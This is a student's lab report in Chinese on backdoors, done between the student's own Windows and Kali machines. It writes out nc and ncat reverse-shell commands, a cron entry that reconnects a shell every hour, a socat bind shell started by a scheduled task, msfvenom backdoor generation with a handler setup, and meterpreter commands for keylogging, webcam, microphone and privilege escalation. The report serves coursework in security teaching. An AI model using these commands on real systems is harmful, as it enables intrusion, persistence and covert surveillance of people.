1. 程式人生 > >20155334 曹翔 Exp2 後門原理與實踐

20155334 曹翔 Exp2 後門原理與實踐

bubuko 直接 net 重定向 system 技術 image AR ali

20155334 曹翔 Exp2 後門原理與實踐

不多廢話直接上實驗過程,本實驗的所有端口都是5334。

一、實驗過程

查詢主機Windows和虛擬機kali的ip地址:
技術分享圖片
技術分享圖片

  1. Windows獲得Linux Shell
    1. 使用ncat.exe程序監聽本機的5334端口:
      技術分享圖片
    2. 在Kali環境下,使用nc指令的-e選項反向連接Windows主機的5334端口:
      技術分享圖片
    3. Windows下成功獲得了一個Kali的shell,運行ls指令如下:
      技術分享圖片
  2. Linux獲得Windows Shell
    1. 使用 nc 指令監聽端口:
      技術分享圖片
    2. 在Windows下,使用ncat.exe程序的-e選項項反向連接Kali主機的端口:
      技術分享圖片
    3. Kali下可以看到Windows的命令提示,可以輸入Windows命令:
      技術分享圖片
  3. 使用nc傳輸數據
    1. Windows下監聽端口:
      技術分享圖片
    2. Kali下連接到Windows的端口:
      技術分享圖片
    3. 建立連接之後,就可以傳輸數據了:
      技術分享圖片
      技術分享圖片
  4. 使用ncat實現文件傳輸
    1. 如圖所示,先在windows中打開監聽,然後在linux系統中發送文件:
      技術分享圖片
      技術分享圖片
    2. 文件保存在C:\Users\DELL\Desktop\ncat中:
      技術分享圖片
  5. 使用netcat獲取主機操作Shell,cron啟動
    1. 先在Windows系統下監聽端口:
      技術分享圖片
    2. 在Kali環境下用 crontab -e 編輯定時任務,選擇編輯器也只會用vim了呀:
      技術分享圖片
    3. 在最後一行添加 N * * * * /bin/netcat 172.168.3.2 5334 -e /bin/sh
      ,意思是在每個小時的第N分鐘反向連接Windows主機的端口,就會啟動cron。此處的我取N=48
      技術分享圖片
    4. 當時間到指定分鐘,就已經獲得了Kali的shell:
      技術分享圖片
  6. 使用socat獲取主機操作Shell, 任務計劃啟動(此處本人主機Win8.1系統出現問題,打開任務計劃程序的時候顯示 找不到遠程電腦 經過查詢相關資料發現要將網絡設置重置,為了防止出現以後上不了網的意外,就選擇了新裝win7的虛擬機,繼續實驗)
    1. 在Windows系統下,打開控制面板->管理工具->任務計劃程序,創建任務,填寫任務名稱後,新建一個觸發器:
      技術分享圖片
      技術分享圖片
    2. 下載安裝socat軟件,在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數(可選)一欄填寫 tcp-listen:5334 exec:cmd.exe,pty,stderr

      ,作用是把cmd.exe綁定到端口5334,同時把cmd.exe的stderr重定向到stdout上:
      技術分享圖片

    3. 創建完成之後,可以發現之前創建的任務已經開始運行:
      技術分享圖片

    4. 此時,在Kali環境下輸入指令 socat - tcp:172.168.3.2:5334 ,此時可以發現已經成功獲得了一個cmd shell:

      很遺憾,截圖沒有 (:з」∠),我也很難過T_T

重頭戲來了:

  1. 使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
    1. 輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=5334 -f exe > 5334_backdoor.exe 生成後門程序5334_backdoor.exe
      技術分享圖片
    2. 通過nc指令將生成的後門程序傳送到Windows主機上:
      技術分享圖片
    3. 在Kali上使用 msfconsole 指令進入msf控制臺,MSF打開監聽進程設置payload,設置反彈回連的IP和端口:
    命令 作用
    use exploit/multi/handler 進入handler模式
    set payload windows/meterpreter/reverse_tcp 設置payload
    show options 查看當前信息狀態
    set LHOST 設置LHOST
    set LPORT 設置LPORT
    exploit MSF開始監聽
    技術分享圖片
    1. 設置完成後,執行監聽:
    2. 打開Windows上的後門程序:
    3. 此時Kali上已經獲得了Windows主機的連接,並且得到了遠程控制的shell:
      技術分享圖片
  2. 使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
命令 作用
record_mic 截獲一段音頻
webcam_snap 使用攝像頭進行拍照
webcam stream 使用攝像頭進行錄像
screenshot 截屏
keyscan_start 開始記錄下擊鍵的過程
keyscan_dump 讀取擊鍵的記錄
getuid 查看當前用戶
getsystem 進行提權

技術分享圖片

想看使用攝像頭拍的照片麽?就不給你看,怕嚇壞你······好吧,其實是我用的Win7虛擬機並沒有使用電腦主機攝像頭的驅動,所以就沒有啦啦啦啦,
不過特別想看的話,諾,給你咯
技術分享圖片
不要懷疑,這就是我,嗯。

二、實驗中遇到的問題及解決

問題1:打開任務計劃程序的時候顯示找不到遠程電腦
解決辦法:應急辦法選擇了新裝win7的虛擬機,後續解決辦法將網絡設置重置即可。

問題2:提權失敗
解決辦法:使用管理員權限運行windows裏的,從kali傳過去的後臺程序5334_backdoor.exe。

三、問題回答:

  1. 例舉你能想到的一個後門進入到你系統中的可能方式?
    答:最常見的就是通過軟件安裝包的捆綁,此外還有以前學習信息安全技術基礎時學到的將後臺程序和文件一起制成壓縮包,在解壓的時候安裝植入。

  2. 例舉你知道的後門如何啟動起來(win及linux)的方式?
    答:windows:啟動任務計劃程序、開機自啟動、捆綁運行(這些360都能解決哎)linux:通過在cron中添加任務(目前就知道這一個,噗)。

  3. Meterpreter有哪些給你映像深刻的功能?
    答:當然是獲取攝像頭啦,還有獲取麥克風,這倆結合起來簡直·····嗯······,餵餵,想啥呢??我說的可以當監控使用。

  4. 如何發現自己有系統有沒有被安裝後門?
    答:當然是360大法好啦,當然也不能總是依靠這些軟件,還有別的方法,比如······騰訊電腦管家??

四、實驗總結與體會

總的來說,這次實驗帶給我太多的感觸和震撼,不得不說,這些後門軟件的威力不容小覷,即使是最簡單的,最低級的後門軟件,都能實現這些看起很難實現,卻的的確確發生的功能。很難想象在安全軟件沒有普及的時候,人們上網的風險有多高。這次實驗讓我更加的感謝360,要不是它首先免費·····額,應該是感謝老師,要不是您,我還不能夠深刻的了解到這些後門程序的危害,我是認真的。

20155334 曹翔 Exp2 後門原理與實踐